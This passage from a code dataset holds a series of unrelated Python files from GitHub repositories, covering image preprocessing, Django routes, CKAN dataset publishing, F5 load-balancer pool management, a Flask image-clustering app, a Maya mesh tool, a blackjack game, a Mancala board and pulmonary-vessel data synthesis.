range(0,number_of_tiles_tuple[1]):\n # the inner for loop will iterate over width.\n for j in range(0,number_of_tiles_tuple[0]):\n points=(j*input_image_size[0],i*input_image_size[1],(j+1)*input_image_size[0],(i+1)*input_image_size[1])\n frame = img.crop(points)\n frame.save(directory+\"/crop_\"+str(i)+\"_\"+str(j)+\"_\"+\".jpg\")\n\n\nif __name__ == \"__main__\":\n # test if the function works.\n make_Tiles('../Preprocess_data/dhiki.jpg',(5,2),\"../image_tiles\")\n\n\n\n\n","repo_name":"rashid0531/predictive_contador_de_flores","sub_path":"Preprocess_data/another_slicer.py","file_name":"another_slicer.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71491644094","text":"import cv2\nimport os\n\n\ndef file_name(file_dir):\n # print file_dir\n L = []\n for root, dirs, files in os.walk(file_dir):\n # print(root)\n # print(dirs)\n #print file_dir\n for file in files:\n if os.path.splitext(file)[1] == '.jpg':\n L.append(os.path.join(file))\n return L\nfile_dir='/root/darknet/scripts/VOCdevkit/VOCaccuracy/wat1212/'\ngoal_dir='/root/darknet/scripts/VOCdevkit/VOCaccuracy/wat1212black/'\nfor name in file_name(file_dir):\n img = cv2.imread(file_dir+name);\n dot = name.find('.')\n # namenum=int(name[:dot])\n rows, cols, channels = img.shape\n for i in range(rows):\n for j in range(cols):\n for c in range(3):\n \timg[i,j][c]=255-img[i,j][c]\n \n cv2.imwrite(goal_dir+name, img)","repo_name":"yenanfei/Pascal-VOC-standardizing","sub_path":"changewhite.py","file_name":"changewhite.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36708153731","text":"from django.urls import path\nfrom django.contrib.auth.views import login\nfrom . import views\n\napp_name = 'featureselection'\nurlpatterns = [\n path('', views.index, name='index'),\n path('add_task/', views.add_task, name='add_task'),\n path('task_result/', views.task_result, name='task_result'),\n path('show_result/', views.show_result, name='show_result'),\n path('show_user_result/', views.show_user_result, name='show_user_result'),\n path('show_best_result/', views.show_best_result, name='show_best_result'),\n path('export_result///', views.export_result, name='export_result'),\n path('analyze_user_choice/', views.analyze_user_choice, name='analyze_user_choice'),\n path('delete_own_result/', views.delete_own_result, name='delete_own_result'),\n path('show_history/', views.show_history, name='show_history'),\n path('delete_task//', views.delete_task, name='delete_task'),\n path('download///', views.download, name='download'),\n path('download_bestsubset/', views.download_bestsubset, name='download_bestsubset'),\n path('choose_result///', views.choose_result, name='choose_result'),\n]","repo_name":"rishabhgoel04/fsSelectionProject","sub_path":"featureselection/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3602832046","text":"\"\"\"\nPublish HSCIC Indicators to CKAN !\n\"\"\"\nimport logging\nimport sys\nimport ffs\nimport dc\n\n\nlogging.basicConfig(filename='publish.log',\n format='%(asctime)s %(levelname)s: %(message)s',\n level=logging.DEBUG)\n\n\nDATA_DIR = ffs.Path.here()/'../data'\n\n\ndef publish_indicators(start_from=0):\n indicatorfile = DATA_DIR/'indicators.json'\n logging.info('Loading {}'.format(indicatorfile))\n indicators = indicatorfile.json_load()\n amount = len(indicators)\n logging.info('Processing {} indicators'.format(amount))\n logging.info('Starting from record {}'.format(start_from))\n for indicator in indicators[start_from:10]:\n logging.info('{} of {}'.format(start_from, amount))\n start_from += 1\n try:\n logging.info('Processing {}'.format(indicator['title']))\n logging.info('ID: {}'.format(indicator['unique identifier'].lower()))\n resources = [\n dict(\n description=s['description'],\n name=s['url'].split('/')[-1],\n format=s['filetype'],\n upload=dc.fh_for_url(s['url'])\n )\n for s in indicator['sources']\n ]\n name = 'hscic_indicator_{}'.format(indicator['unique identifier'].lower())\n # Metadata specified by NHSEngland identified in comments...\n dc.Dataset.create_or_update(\n name=name, # Unique ID\n title=indicator['title'], #title\n notes=indicator['definition'], # description\n tags=dc.tags(*indicator['keyword(s)']), # tags\n extras=[\n {'key': 'Public Access Level',\n 'value': 'Public',},\n {'key': 'Data Quality Assurance',\n 'value': 'False'},\n {'key': 'Release Date',\n 'value': indicator['current version uploaded'],},\n {'key': 'Status',\n 'value': 'Live',},\n ],\n state='active',\n licence_id='ogl',\n url='https://indicators.ic.nhs.uk/webview/',\n resources=resources,\n groups=[\n {'name': 'indicators'},\n ],\n owner_org='hscic' # publisher\n )\n except Exception as ex:\n logging.error(ex)\n return\n\ndef publish_datasets(start_from=0):\n datasetfile = DATA_DIR/'datasets.json'\n logging.info('Loading {}'.format(datasetfile))\n datasets = datasetfile.json_load()\n amount = len(datasets)\n logging.info('Processing {} datasets'.format(amount))\n logging.info('Starting from record {}'.format(start_from))\n for dataset in datasets[start_from:10]:\n try:\n logging.info('{} of {}'.format(start_from, amount))\n start_from += 1\n logging.info('Processing {}'.format(dataset['title']))\n logging.info('ID: {}'.format(dataset['id']))\n resources = [\n dict(\n description=s['description'],\n name=s['url'].split('/')[-1],\n format=s['filetype'],\n upload=dc.fh_for_url(s['url'])\n )\n for s in dataset['sources']\n ]\n notes = dataset['summary']\n if 'key_facts' in dataset:\n notes += '\\n\\nKEY FACTS:\\n==========\\n\\n' + dataset['key_facts']\n extras = [\n {'key': 'Public Access Level',\n 'value': 'Public',},\n {'key': 'Data Quality Assurance',\n 'value': 'False'},\n {'key': 'Status',\n 'value': 'Live',},\n ]\n if 'date_range' in dataset:\n extras.append({\n 'key': 'Time period',\n 'value': dataset['date_range'],\n })\n if 'publication_date' in dataset:\n extras.append({\n 'key': 'Release date',\n 'value': dataset['publication_date'],\n })\n if 'geographical_coverage' in dataset:\n extras.append({\n 'key': 'Geographical coverage',\n 'value': ', '.join(dataset['geographical_coverage'])\n })\n # groups\n groups = []\n for item in dataset['topics']:\n groups.append(item)\n for item in dataset['information_types']:\n groups.append(item)\n group_faff = []\n for g in groups:\n group_name = dc.ensure_group(g, 'HSCIC')\n group_faff.append({\n 'name': group_name,\n })\n name = 'hscic_dataset_{}'.format(dataset['id'])\n # NHSEngland metadata as comments...\n dc.Dataset.create_or_update(\n name=name, # Unique ID\n title=dataset['title'], # title\n notes=notes, # description\n tags=dc.tags(*dataset['keywords']), # tags\n extras=extras,\n state='active',\n licence_id='ogl',\n url=dataset['source'],\n resources=resources,\n groups=group_faff,\n owner_org='hscic' # publisher\n )\n except Exception as ex:\n logging.error(ex)\n return\n\ndef main():\n dc.ensure_publisher('hscic')\n dc.ensure_group('indicators', 'hscic')\n publish_indicators()\n publish_datasets()\n return 0\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"davidmiller/hscic","sub_path":"publish/hscic_indicators_to_ckan.py","file_name":"hscic_indicators_to_ckan.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16392566171","text":"'prepare a training file from train.csv and train_answers.csv'\n\nimport sys, csv\n\noutput_file = sys.argv[1]\n\ninput_file = 'data/orig/train.csv'\nanswers_file = 'data/orig/train_answers.csv'\n\n# mapping author -> gender\n\nwriters = {}\nreader = csv.reader( open( answers_file ))\nheaders = reader.next()\n\nfor line in reader:\n\twriter_id, gender = line\n\twriters[writer_id] = gender\n\t\n###\n\nreader = csv.reader( open( input_file ))\nwriter = csv.writer( open( output_file, 'wb' ))\n\n# prep headers\nheaders = reader.next()\nheaders = headers[2:]\nheaders.insert( 0, 'gender' )\nwriter.writerow( headers )\n\nfor line in reader:\n\t\n\tif line[2] == 'Arabic':\n\t\tline[2] = 0\n\telse:\n\t\tline[2] = 1\n\t\t\n\twriter_id = line[0]\n\tgender = writers[writer_id]\n\n\tline = line[2:]\n\tline.insert( 0, gender )\n\t\n\twriter.writerow( line )\n\t\n\t","repo_name":"zygmuntz/kaggle-gender","sub_path":"prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"7399083880","text":"from f5.bigip import ManagementRoot\n\n# Connect to the BigIP\nmgmt = ManagementRoot(\"10.100.116.200\", \"admin\", \"eve\")\n\n\n#Delete a pool if it exists\nif mgmt.tm.ltm.pools.pool.exists(name='mypool', partition='Common'):\n pool_b = mgmt.tm.ltm.pools.pool.load(name='mypool', partition='Common')\n pool_b.delete()\n\n\nprint(\"============= Version ============\" + '\\n' + \n mgmt.tmos_version+ '\\n' + \n \"==================================\" )\n\n\n# Create a new pool on the BIG-IP\nmgmt.tm.ltm.pools.pool.create(name='mypool', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool2', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool3', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool4', partition='Common')\nmgmt.tm.ltm.pools.pool.create(name='mypool5', partition='Common')\n\n# Load an existing pool and update its description\npool_a = mgmt.tm.ltm.pools.pool.load(name='mypool', partition='Common')\npool_a.description = \"New description\"\npool_a.update()\n\n\n# Get a list of all pools on the BigIP and print their names and their\n# members' names\npools = mgmt.tm.ltm.pools.get_collection()\nfor pool in pools:\n print(pool.name)\n for member in pool.members_s.get_collection():\n print(member.name)\n","repo_name":"socio-nine/Network-Automation-Python","sub_path":"F5/f5_api_1.py","file_name":"f5_api_1.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43660031015","text":"def test_form_view(request):\n if request.method == \"POST\":\n form = TestForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('save ho gya bhai!')\n else:\n return HttpResponse('noooo its invalid')\n\n return render(request, 'test.html', {\n 'objects': TestModel.objects.all()\n })","repo_name":"Ammadkhalid/django-mvv-for-ahmad","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38727483000","text":"import json\n\nfrom starlette.responses import PlainTextResponse\nfrom starlette.status import (\n HTTP_404_NOT_FOUND,\n HTTP_406_NOT_ACCEPTABLE,\n HTTP_400_BAD_REQUEST,\n HTTP_501_NOT_IMPLEMENTED,\n HTTP_500_INTERNAL_SERVER_ERROR,\n)\n\n\ndef response_error_handler(result):\n if result[\"status\"] == 501:\n return http_501_not_implemented()\n if result[\"status\"] == 500:\n return http_500_internal_server_error()\n if result[\"status\"] == 406:\n return http_406_not_acceptable()\n if result[\"status\"] == 400:\n return http_400_bad_request()\n if result[\"status\"] == 501:\n return http_501_not_implemented()\n if result[\"status\"] == 404:\n return http_404_not_found()\n else:\n return http_unknown_error(result)\n\n\ndef http_unknown_error(result):\n response_msg = json.dumps({\"status_code\": result[\"status\"], \"details\": \"Unknown\"})\n return PlainTextResponse(response_msg, status_code=result[\"status\"])\n\n\ndef http_400_bad_request():\n response_msg = json.dumps(\n {\"status_code\": HTTP_400_BAD_REQUEST, \"details\": \"Bad Request\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_400_BAD_REQUEST)\n\n\ndef http_404_not_found():\n response_msg = json.dumps(\n {\"status_code\": HTTP_404_NOT_FOUND, \"details\": \"Not Found\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_404_NOT_FOUND)\n\n\ndef http_406_not_acceptable():\n response_msg = json.dumps(\n {\"status_code\": HTTP_406_NOT_ACCEPTABLE, \"details\": \"Not Acceptable\"}\n )\n return PlainTextResponse(response_msg, status_code=HTTP_406_NOT_ACCEPTABLE)\n\n\ndef http_501_not_implemented():\n response_msg = json.dumps(\n {\n \"status_code\": HTTP_501_NOT_IMPLEMENTED,\n \"details\": \"Not Implemented\",\n }\n )\n return PlainTextResponse(response_msg, status_code=HTTP_501_NOT_IMPLEMENTED)\n\n\ndef http_500_internal_server_error():\n response_msg = json.dumps(\n {\n \"status_code\": HTTP_500_INTERNAL_SERVER_ERROR,\n \"details\": \"Internal Server Error\",\n }\n )\n return PlainTextResponse(response_msg, status_code=HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"Ensembl/ensembl-web-metadata-api","sub_path":"app/api/error_response.py","file_name":"error_response.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70967470656","text":"from flask import *\nfrom kmeans import k_cluster\nfrom utils import flatten_input, unflatten_input, image_to_mat\nfrom PIL import Image as im\nimport numpy as np\nfrom keras.preprocessing.image import save_img\nimport gunicorn\nimport os, re, os.path\nimport gc\n\ndef get_size(fobj):\n\n if fobj.content_length:\n return fobj.content_length\n\n try:\n pos = fobj.tell()\n fobj.seek(0, 2) #seek to end\n size = fobj.tell()\n fobj.seek(pos) # back to original position\n return size\n except (AttributeError, IOError):\n pass\n\n # in-memory file object that doesn't support seeking or tell\n return 0 #assume small enough\n\n\n\napp = Flask(__name__)\n@app.route('/')\ndef upload():\n return render_template(\"file_upload_form.html\")\n\n@app.route('/success', methods = ['POST'])\ndef success():\n folder = \"static/\"\n\n if request.method == \"POST\":\n gc.collect()\n for root, dirs, all_files in os.walk(folder):\n for item in all_files:\n if item!= \"sample.png\":\n os.remove(os.path.join(root, item))\n f = request.files[\"file\"]\n obj_size = get_size(f) \n\n if obj_size > 200*1024:\n abort(413)\n\n\n if obj_size == 0:\n abort(400, \"please upload a picture before submission\")\n\n if len(request.form.get(\"num_clusters\"))!=0:\n num_clus = int(request.form.get(\"num_clusters\"))\n else:\n abort(400, \"please set the number of clusters before submission\")\n out = folder+f.filename\n f.save(out)\n image_mat = image_to_mat(out)\n new_image = k_cluster(image_mat, k=num_clus)\n del image_mat\n raw_name = f.filename.split(\".\")[0] + \"_cluster\"+ str(num_clus) \\\n + \".png\" \n path_out = folder + raw_name \n save_img(path_out, new_image)\n del new_image\n gc.collect()\n return render_template(\"success.html\", name = out, num_clusters = num_clus, processed_img = path_out )\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"Arjunvankani/Segmenatation-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42612235738","text":"\"\"\"\nParametric Mesh Creation for Scene Setup\n\"\"\"\nfrom gt.utils.data.py_meshes.mesh_data import MeshData\nimport maya.cmds as cmds\nimport logging\n\n# Logging Setup\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_studio_background(name=\"studio_background\", initial_scale=1):\n \"\"\"\n Creates a studio background mesh\n Args:\n name (str, optional): The name for the created mesh.\n initial_scale (int, float, optional): Sets the initial scale of the mesh object\n \"\"\"\n selection = cmds.ls(selection=True)\n plane_transform, poly_plane_node = cmds.polyPlane(name=name, w=1, h=1, sx=10, sy=10, ax=(0, 1, 0), cuv=2, ch=1)\n\n # Set attributes for the poly plane\n cmds.setAttr(f\"{poly_plane_node}.height\", 40)\n cmds.setAttr(f\"{poly_plane_node}.width\", 40)\n cmds.setAttr(f\"{poly_plane_node}.subdivisionsHeight\", 50)\n cmds.setAttr(f\"{poly_plane_node}.subdivisionsWidth\", 50)\n\n cmds.rename(poly_plane_node, f'{name}_polyPlane')\n\n # Create a bend deformer and set its attributes\n bend_node_one, bend_handle_one = cmds.nonLinear(plane_transform, name=f'{name}_bendY', typ=\"bend\",\n lowBound=0, highBound=1, curvature=90)\n\n cmds.rotate(0, -90, 0, bend_handle_one, r=True, os=True, fo=True)\n cmds.rotate(0, 0, 90, bend_handle_one, r=True, os=True, fo=True)\n\n bend_node_two, bend_handle_two = cmds.nonLinear(plane_transform, name=f'{name}_bendZ', typ=\"bend\",\n lowBound=-1, highBound=1, curvature=110)\n\n bend_handles = [bend_handle_one, bend_handle_two]\n\n cmds.rotate(0, -90, 0, bend_handle_two, r=True, os=True, fo=True)\n cmds.rotate(-90, 0, 0, bend_handle_two, r=True, os=True, fo=True)\n cmds.move(0, 0, 7, bend_handle_two, r=True)\n\n cmds.parent([bend_handle_one, bend_handle_two], plane_transform)\n\n cmds.move(0, 0, -10, plane_transform, r=True)\n cmds.xform(plane_transform, piv=(0, 0, 11), ws=True)\n cmds.move(0, 0, 0, plane_transform, a=True, rpr=True) # rpr flag moves it according to the pivot\n\n for handle in bend_handles:\n cmds.setAttr(f'{handle}.v', 0)\n\n cmds.setAttr(f'{plane_transform}.sx', initial_scale)\n cmds.setAttr(f'{plane_transform}.sy', initial_scale)\n cmds.setAttr(f'{plane_transform}.sz', initial_scale)\n\n cmds.select(clear=True)\n if selection:\n try:\n cmds.select(selection)\n except Exception as e:\n logger.debug(f'Unable to recover selection. Issue: {str(e)}')\n\n return MeshData(name=plane_transform, setup=bend_handles)\n\n\nif __name__ == \"__main__\":\n logger.setLevel(logging.DEBUG)\n cmds.file(new=True, force=True)\n create_studio_background()\n","repo_name":"ChunMinStudio/gt-tools","sub_path":"gt/utils/data/py_meshes/scene_setup.py","file_name":"scene_setup.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"13711599284","text":"import random\r\n\r\nfrom art import logo \r\n# deal_card() function that uses the list to return a random card.\r\ndef deal_cards():\r\n \"\"\"This function draws one card from the deck of cards. Here 11 is ace.\"\"\"\r\n cards = [2,3,4,5,6,7,8,9,10,10,10,10,11]\r\n card = random.choice(cards)\r\n return card\r\n\r\n# calculate_score() that takes a list of cards as input and return score\r\n# Look up the sum() function\r\ndef calculate_scores(cards):\r\n# check for a blackjack (a hand with only 2 cards: ace + 10) and return 0 instead of the actual score.\r\n# 0 will represent a blackjack in our game.\r\n if sum(cards)==21 and len(cards)==2:\r\n return 0\r\n # check for an 11 (ace). If the score is already over 21, \r\n # remove the 11 and replace it with a 1. \r\n # You might need to look up append() and remove().\r\n if 11 in cards and sum(cards)>21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\n# compare function\r\ndef compare(user_score,dealer_score):\r\n if user_score == dealer_score:\r\n return \"It's a Draw.\"\r\n elif dealer_score == 0:\r\n return \"You lose, Opponent has a BlackJack\"\r\n elif user_score == 0:\r\n return \"You Win.\"\r\n elif user_score > 21:\r\n return \"You lose you went over 21.\"\r\n elif dealer_score > 21:\r\n return \"You Win, Opponent went over.\"\r\n elif user_score>dealer_score:\r\n return \"You Win\"\r\n else:\r\n return \"You Lose.\"\r\n\r\ndef play_game():\r\n print(logo)\r\n user_cards = []\r\n dealer_cards = []\r\n is_gameover = False\r\n\r\n for _ in range(2):\r\n user_cards.append(deal_cards())\r\n dealer_cards.append(deal_cards())\r\n\r\n while not is_gameover:\r\n user_score = calculate_scores(user_cards)\r\n dealer_score = calculate_scores(dealer_cards)\r\n print(f\"Your Cards: {user_cards}, Your Current Score is: {user_score}\")\r\n print(f\"Dealers Cards: {dealer_cards[0]}\")\r\n\r\n if user_score == 0 or dealer_score == 0 or user_score > 21:\r\n is_gameover = True\r\n else:\r\n deal = input(\"Type 'y' to get another card, type 'n' to pass: \\n\")\r\n if deal == 'y':\r\n user_cards.append(deal_cards())\r\n else:\r\n is_gameover= True\r\n\r\n while dealer_score != 0 and dealer_score < 17:\r\n dealer_cards.append(deal_cards())\r\n dealer_score = calculate_scores(dealer_cards)\r\n\r\n print(f\"You Final hand is {user_cards}, Final Score: {user_score}\")\r\n print(f\"Dealer's hand is {dealer_cards}, Final Score: {dealer_score}\")\r\n print(compare(user_score, dealer_score))\r\n\r\nwhile input(\"Do you want to play a game of 21? Type 'y' or 'n': \")==\"y\":\r\n \r\n play_game()\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"wiznikvibe/BLACKJACK","sub_path":"capstone_blackjack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13462325045","text":"import pygame\nfrom stone import Stone\nimport numpy as np\nfrom const import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n BOARD_COLOR,\n BOWL_COLOR\n)\n\n\nclass Board():\n currently_animating = False\n state = {\n 'bowl': {\n 'p1': [[]]*6,\n 'p2': [[]]*6\n },\n 'goal': {\n 'p1': [],\n 'p2': []\n },\n 'moving': []\n }\n turn = 'p1'\n\n center = (SCREEN_WIDTH/2, SCREEN_HEIGHT/2)\n goal_width = 75\n hor_offset = 20\n board_shape = (700, 200)\n bowl_diameter = (board_shape[0] - (2*goal_width) - (9*hor_offset))/6\n ver_offset = (board_shape[1]-2*bowl_diameter)/3 \n p1_bowl_pos = []\n p2_bowl_pos = []\n p1_goal_pos = None\n p2_goal_pos = None\n\n def init_stones_on_bowl(self, bowl_center, bowl_index, player):\n pos = (bowl_center[0],bowl_center[1] + self.bowl_diameter/4)\n stone_1 = Stone(pos)\n pos = (bowl_center[0] + self.bowl_diameter/4,bowl_center[1])\n stone_2 = Stone(pos)\n pos = (bowl_center[0],bowl_center[1] - self.bowl_diameter/4)\n stone_3 = Stone(pos)\n pos = (bowl_center[0] - self.bowl_diameter/4,bowl_center[1])\n stone_4 = Stone(pos)\n self.state['bowl'][player][bowl_index] = [stone_1, stone_2, stone_3, stone_4]\n \n\n def init_stones(self):\n # initialize stones on the board\n for i in range(6):\n self.init_stones_on_bowl(self.p1_bowl_pos[i], i, 'p1')\n self.init_stones_on_bowl(self.p2_bowl_pos[i], i, 'p2')\n\n\n def __init__(self):\n self.surf = pygame.Surface(self.board_shape)\n self.surf.fill(BOARD_COLOR)\n self.pos = (self.center[0]-(self.surf.get_width()/2), self.center[1]-(self.surf.get_height()/2))\n\n # initialize bowl positions\n for i in range(6):\n x_pos = self.center[0] - self.surf.get_width()/2 + self.hor_offset*2 + self.goal_width + self.bowl_diameter/2 + (self.bowl_diameter+self.hor_offset)*i\n y_pos = self.center[1] - self.ver_offset/2 - self.bowl_diameter/2\n self.p2_bowl_pos.append(np.array([x_pos,y_pos]))\n y_pos += self.ver_offset + self.bowl_diameter\n self.p1_bowl_pos.append(np.array([x_pos,y_pos]))\n\n # initialize stones\n self.init_stones() \n\n # def update(self):\n # for bowl in self.state['bowl']['p1']:\n # for stone in bowl:\n # stone.update()\n # for bowl in self.state['bowl']['p2']:\n # for stone in bowl:\n # stone.update()\n\n\n def draw(self, screen):\n # draw board background\n screen.blit(self.surf, self.pos)\n\n # draw left goal\n left = self.center[0]-(self.surf.get_width()/2) + self.hor_offset\n top = self.center[1]-(self.surf.get_height()/2) + self.ver_offset\n self.p2_goal_pos = (self.center[0]-(self.surf.get_width()/2) + self.hor_offset + self.goal_width/2, self.center[1])\n bound = pygame.Rect(left, top, self.goal_width, self.board_shape[1]-2*self.ver_offset)\n pygame.draw.ellipse(screen, BOWL_COLOR, bound)\n\n # draw right goal\n left = self.center[0]+(self.surf.get_width()/2) - self.hor_offset - self.goal_width\n self.p1_goal_pos = (self.center[0]+(self.surf.get_width()/2) - self.hor_offset - self.goal_width/2, self.center[1])\n bound = pygame.Rect(left, top, self.goal_width, self.board_shape[1]-2*self.ver_offset)\n pygame.draw.ellipse(screen, BOWL_COLOR, bound)\n\n # draw bowls\n for i in range(6): \n pygame.draw.circle(screen, BOWL_COLOR, self.p1_bowl_pos[i], self.bowl_diameter/2)\n pygame.draw.circle(screen, BOWL_COLOR, self.p2_bowl_pos[i], self.bowl_diameter/2)\n\n # draw stones\n for bowl in self.state['bowl']['p1']:\n for stone in bowl:\n stone.draw(screen)\n for bowl in self.state['bowl']['p2']:\n for stone in bowl:\n stone.draw(screen)\n for stone in self.state['goal']['p1']:\n stone.draw(screen)\n for stone in self.state['goal']['p2']:\n stone.draw(screen)\n for stone in self.state['moving']:\n stone.draw(screen)","repo_name":"Annacaro22/4701Mancala","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5737411770","text":"import numpy as np\nimport os\nimport SimpleITK as sitk\nimport random\nimport json\nimport argparse\nimport sys\n\n\nclass DataSyn:\n def __init__(\n self,\n source_dir,\n target_dir,\n ):\n \"\"\"\n source_dir: The directory of the raw data.\n target_dir: The directory of the data to be synthesized.\n\n Input: source_dir/\n - pulse_xxxxx_volume.nii.gz % original volume\n - pulse_xxxxx_graph.json % graph with edge information\n ...\n\n Output: target_dir/\n - pulse_xxxxx_idx_volume.nii.gz % synthesized volume with single disconnection\n - pulse_xxxxx_idx_kp1_part.nii.gz % kp1 part of the synthesized volume\n - pulse_xxxxx_idx_kp2_part.nii.gz % kp2 part of the synthesized volume\n - pulse_xxxxx_idx_data.npz % meta data of the synthesized volume\n ...\n\n Note: centerline infomation will not be used in this process.\n \"\"\"\n self.source_dir = source_dir\n self.target_dir = target_dir\n self.pulse_ids = [i[:11] for i in os.listdir(source_dir) if '.json' in i]\n\n def data_process(self, pulse_id, volume, edge, idx):\n point_coord = np.array(edge['point_coord'])\n point_number = edge['point_number']\n tolerance = 0\n flag = 0\n while True:\n # choose the location of KP1 and KP2\n kp1_range = [0.05, 0.4]\n kp2_range = [0.6, 0.95]\n kp1_location = np.random.random() * (kp1_range[1] - kp1_range[0]) + kp1_range[0]\n kp2_location = np.random.random() * (kp2_range[1] - kp2_range[0]) + kp2_range[0]\n kp1 = point_coord[round(kp1_location * point_number)]\n kp2 = point_coord[round(kp2_location * point_number)]\n kp_mid = point_coord[round(0.5 * point_number)]\n coords = np.argwhere(volume != 0)\n\n edge_points_dif = point_coord[1:] - point_coord[:-1] # point_x - point_(x+1)\n edge_points_dis = np.sqrt(np.sum(edge_points_dif ** 2, axis=1))\n edge_points_toend_dis = []\n for i in range(point_number):\n if i == 0:\n edge_points_toend_dis.append(0.0)\n elif i == point_number - 1:\n edge_points_toend_dis.append(0.0)\n else:\n edge_points_toend_dis.append(min(np.sum(edge_points_dis[:i]), np.sum(edge_points_dis[i:])))\n edge_points_toend_dis = np.array(edge_points_toend_dis)\n\n vector_1 = kp_mid - kp1\n vector_2 = kp_mid - kp2\n radius_cutoff = np.random.random() * (2 - 1.3) + 1.3\n noise_level = np.random.random() * (4 - 1) + 1\n\n for p in coords:\n if (p - kp1).dot(vector_1) > 0 and (p - kp2).dot(vector_2) > 0:\n distance = np.sum((p - point_coord) ** 2, axis=1)\n closest_index = np.argmin(distance)\n\n if distance[closest_index] < (edge['radius_max'] * radius_cutoff) ** 2:\n volume[p[0], p[1], p[2]] = 0\n ratio = 1 - (edge_points_toend_dis[closest_index] / np.max(edge_points_toend_dis))\n\n if random.random() < ratio ** noise_level * 0.5:\n volume[p[0], p[1], p[2]] = 1\n\n volume_img = sitk.GetImageFromArray(volume)\n component_image = sitk.ConnectedComponent(volume_img)\n sorted_component_image = sitk.RelabelComponent(component_image, minimumObjectSize=15, sortByObjectSize=True)\n sorted_component = sitk.GetArrayFromImage(sorted_component_image)\n\n # label_0: the label of the kp1 component; label_1: the label of the kp2 component\n label_0 = sorted_component[kp1[0], kp1[1], kp1[2]]\n label_1 = sorted_component[kp2[0], kp2[1], kp2[2]]\n\n # label=0: background\n if label_0 * label_1 > 0 and label_0 != label_1:\n seg_0 = sorted_component == label_0\n seg_1 = sorted_component == label_1\n disconnected_volume = np.logical_or(seg_0, seg_1) + 0\n seg_0_size = np.sum(seg_0)\n seg_1_size = np.sum(seg_1)\n\n # make sure kp1 locate at the main part of the pulmonary tree\n if seg_0_size > seg_1_size:\n kp1_seg = seg_0 + 0\n kp2_seg = seg_1 + 0\n kp1_coord = kp1\n kp2_coord = kp2\n else:\n kp1_seg = seg_1 + 0\n kp2_seg = seg_0 + 0\n kp1_coord = kp2\n kp2_coord = kp1\n\n disconnected_volume_nii = sitk.GetImageFromArray(np.uint8(disconnected_volume))\n sitk.WriteImage(disconnected_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_'+str(idx)+'_volume.nii.gz')\n\n kp1_volume_nii = sitk.GetImageFromArray(np.uint8(kp1_seg))\n sitk.WriteImage(kp1_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_' + str(idx) + '_kp1_part.nii.gz')\n\n kp2_volume_nii = sitk.GetImageFromArray(np.uint8(kp2_seg))\n sitk.WriteImage(kp2_volume_nii, os.path.join(self.target_dir, pulse_id) +\n '_' + str(idx) + '_kp2_part.nii.gz')\n\n npz_name = os.path.join(self.target_dir, pulse_id + '_' + str(idx) + '_data.npz')\n if not os.path.exists(npz_name):\n np.savez_compressed(npz_name,\n volume=disconnected_volume,\n kp1_part=kp1_seg,\n kp2_part=kp2_seg,\n kp1_coord=kp1_coord,\n kp2_coord=kp2_coord,\n edge_points=point_coord, # (n,3)\n edge_radius_avg=edge['radius_avg'],\n edge_radius_min=edge['radius_min'],\n edge_radius_max=edge['radius_max'],\n edge_volume=edge['volume'],\n edge_surface_area=edge['surface_area'],\n edge_length=edge['length'],\n edge_tortuosity=edge['tortuosity']\n )\n print('{} has been processed!'.format(pulse_id + '_' + str(idx)))\n flag = 1\n break\n else:\n if tolerance > 10:\n print('{} does not work!!!'.format(pulse_id))\n break\n tolerance += 1\n return flag\n\n def data_synthesis(self, volume_num, radius_range, points_threshold):\n for pulse_id in self.pulse_ids:\n # read json\n json_file = os.path.join(self.source_dir, pulse_id+'_graph.json')\n with open(json_file, 'r') as f:\n graph = json.load(f)\n\n # read volume.nii.gz\n volume_file = os.path.join(self.source_dir,pulse_id+'_volume.nii.gz')\n volume = sitk.GetArrayFromImage(sitk.ReadImage(volume_file)) # uint8\n\n 